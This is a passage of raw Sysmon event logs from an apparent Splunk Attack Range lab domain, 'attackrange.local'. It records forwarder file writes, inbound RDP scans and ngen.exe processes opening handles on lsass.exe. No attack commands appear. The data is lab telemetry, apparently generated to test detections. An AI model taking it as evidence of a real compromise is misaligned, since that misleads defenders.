Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53F11A34BA4CDA62DF43009D374C2229,SHA256=6CAFB110B38A2129D5633EFEA44E6A71A3EA2EED417A6ACFA15DA4E3403B4036,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050239Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:14.413{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com61732-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000073466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:17.749{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C379852D1BC8EC720BE05F3AE43A92A3,SHA256=AA48F247C6B06FE2681A1320EFEF8182D44C9EEC9B9677FE98F780C33F71534C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:17.296{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E03EF164A1514967D7A7BCA1A1AE9791,SHA256=47AC777DCAA75995EA435B33958A8601843C8C4535F7EE912558F42B178A6F77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050244Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:17.859{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=644AB3702067AB6BF6B5D0090E72F486,SHA256=A2A6C070C674A31D35E6C105ECDE1DA74E837FEDF82B060E76B8D1189127A86C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050243Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:15.623{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52521-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050242Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:15.249{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65412-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050241Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:17.141{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFC449AAE234E24A4B5E678872976662,SHA256=14B966195CEE26CAA52C7707901CDF040A4E963FCFBDA9C001F8889F14ED4633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:18.765{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2FFF080114D7D51A186BF7B3F5356FF6,SHA256=27AB5CACC0264182D9AB268D693002146D9CFF115C89BC6A43FF89B7E9C9171D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:18.733{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E6C6BD8BE8DD2A443F0EFAC07A1B82F,SHA256=E17111BF3D0DE8BC7B6AF5F9AAE27EF30B4006666813C69D154092A9F0DF0D70,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:17.176{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57531-false10.0.1.12-8000- 354300x800000000000000073468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:16.839{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com49570-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:18.327{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27DDE9099833AE2F543CB1BE9DCA586A,SHA256=06A73FEDADFCD4B79C4312072411DBEA6AC17FAE074CB12F2D4319AB77140041,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050246Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:18.875{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEF66665CB521FC2B513102BC9790F11,SHA256=A298B5C91F3AEB632A11B4E53E9C25EE0B77AF6490D9E3FB4EA9D65A8AD54AF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050245Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:18.172{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AADFC30210E4187C5B9914BD1505FBB3,SHA256=A6C4D66425C2D684F0D8E365E592B8A689C0232CC795B8E58E8FF947D7B81638,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.983{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-CF0B-00000000BB01}5556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.983{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-CF0B-00000000BB01}5556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.983{A7A01FEF-EBCF-607E-CF0B-00000000BB01}5556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.968{A7A01FEF-EBCF-607E-D00B-00000000BB01}66202100C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-CF0B-00000000BB01}5556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.952{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-D00B-00000000BB01}6620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.952{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-CF0B-00000000BB01}5556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.952{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-CF0B-00000000BB01}5556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.952{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-CD0B-00000000BB01}1288c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.952{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-CD0B-00000000BB01}1288c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.952{A7A01FEF-EBCF-607E-CD0B-00000000BB01}1288C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.921{A7A01FEF-EBCF-607E-CE0B-00000000BB01}44485340C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-CD0B-00000000BB01}1288c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.921{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-CE0B-00000000BB01}4448C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.905{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-CD0B-00000000BB01}1288c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.905{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-CD0B-00000000BB01}1288c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.905{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-CB0B-00000000BB01}3664c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.905{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-CB0B-00000000BB01}3664c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.905{A7A01FEF-EBCF-607E-CB0B-00000000BB01}3664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.890{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-CA0B-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.890{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-CA0B-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.890{A7A01FEF-EBCF-607E-CA0B-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.874{A7A01FEF-EBCF-607E-CC0B-00000000BB01}48004856C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-CB0B-00000000BB01}3664c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.874{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-CC0B-00000000BB01}4800C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.874{A7A01FEF-EBCF-607E-C00B-00000000BB01}65486336C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-CA0B-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.874{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-CB0B-00000000BB01}3664c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 